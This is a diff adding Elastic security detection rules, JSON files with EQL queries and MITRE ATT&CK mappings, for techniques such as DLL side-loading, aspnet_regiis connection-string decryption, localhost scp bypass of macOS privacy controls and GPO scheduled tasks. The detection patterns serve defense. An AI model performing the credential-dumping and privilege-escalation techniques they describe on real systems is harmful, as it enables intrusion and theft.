+ "https://shellz.club/2020/10/16/edgegdi-dll-for-persistence-and-lateral-movement.html", + "https://windows-internals.com/faxing-your-way-to-system/", + "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107.json new file mode 100644 index 00000000000..a2d720c84cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Secure Copy Protocol (SCP) to copy files locally by abusing the auto addition of the Secure Shell Daemon (sshd) to the authorized application list for Full Disk Access. This may indicate attempts to bypass macOS privacy controls to access sensitive files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privacy Control Bypass via Localhost Secure Copy", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name:\"scp\" and\n process.args:\"StrictHostKeyChecking=no\" and\n process.command_line:(\"scp *localhost:/*\", \"scp *127.0.0.1:/*\") and\n not process.args:\"vagrant@*127.0.0.1*\"\n", + "references": [ + "https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_108.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_108.json new file mode 100644 index 00000000000..9609a043321 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_108.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of a new GPO Scheduled Task or Service", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\",\n \"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\Services\\\\Services.xml\") and\n not process.name : \"dfsrs.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c0429aa8-9974-42da-bfb6-53a0a515a145_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_109.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_109.json new file mode 100644 index 00000000000..81ce9df4c36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_109.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of a new GPO Scheduled Task or Service", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\",\n \"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\Services\\\\Services.xml\") and\n not process.name : \"dfsrs.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c0429aa8-9974-42da-bfb6-53a0a515a145_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_6.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_6.json new file mode 100644 index 00000000000..55a955e7911 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_6.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the \"index.html\" file within the \"/usr/lib/vmware/*\" directory is renamed on a Linux system. The rule monitors for the \"rename\" event action associated with this specific file and path, which could indicate malicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Renaming of ESXI index.html File", + "query": "file where host.os.type == \"linux\" and event.action == \"rename\" and file.name : \"index.html\" and\nfile.Ext.original.path : \"/usr/lib/vmware/*\"\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.original.path", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c125e48f-6783-41f0-b100-c3bf1b114d16", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "c125e48f-6783-41f0-b100-c3bf1b114d16_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_109.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_109.json new file mode 100644 index 00000000000..9c36063d2ce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_109.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Connection Strings Decryption", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"aspnet_regiis.exe\" or ?process.pe.original_file_name == \"aspnet_regiis.exe\") and\n process.args : \"connectionStrings\" and process.args : \"-pdf\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_110.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_110.json new file mode 100644 index 00000000000..9102664bfc0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_110.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Connection Strings Decryption", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"aspnet_regiis.exe\" or ?process.pe.original_file_name == \"aspnet_regiis.exe\") and\n process.args : \"connectionStrings\" and process.args : \"-pdf\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_106.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_106.json new file mode 100644 index 00000000000..1d5425eab2e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_106.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects modification of a Folder Action script. A Folder Action script is executed when the folder to which it is attached has items added or removed, or when its window is opened, closed, moved, or resized. Adversaries may abuse this feature to establish persistence by utilizing a malicious script.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Folder Action Script", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\", \"info\") and process.name == \"com.apple.foundation.UserScriptService\"] by process.pid\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name in (\"osascript\", \"python\", \"tcl\", \"node\", \"perl\", \"ruby\", \"php\", \"bash\", \"csh\", \"zsh\", \"sh\") and\n not process.args : \"/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt\"\n ] by process.parent.pid\n", + "references": [ + "https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "c292fa52-4115-408a-b897-e14f684b3cb7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c292fa52-4115-408a-b897-e14f684b3cb7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c296f888-eac6-4543-8da5-b6abb0d3304f_2.json b/packages/security_detection_engine/kibana/security_rule/c296f888-eac6-4543-8da5-b6abb0d3304f_2.json new file mode 100644 index 00000000000..261f288159b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c296f888-eac6-4543-8da5-b6abb0d3304f_2.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where GDB (granted the CAP_SYS_PTRACE capability) is executed, after which the user's access is elevated to UID/GID 0 (root). In Linux, the CAP_SYS_PTRACE capability grants a process the ability to use the ptrace system call, which is typically used for debugging and allows the process to trace and control other processes. Attackers may leverage this capability to hook and inject into a process that is running with root permissions in order to escalate their privileges to root.", + 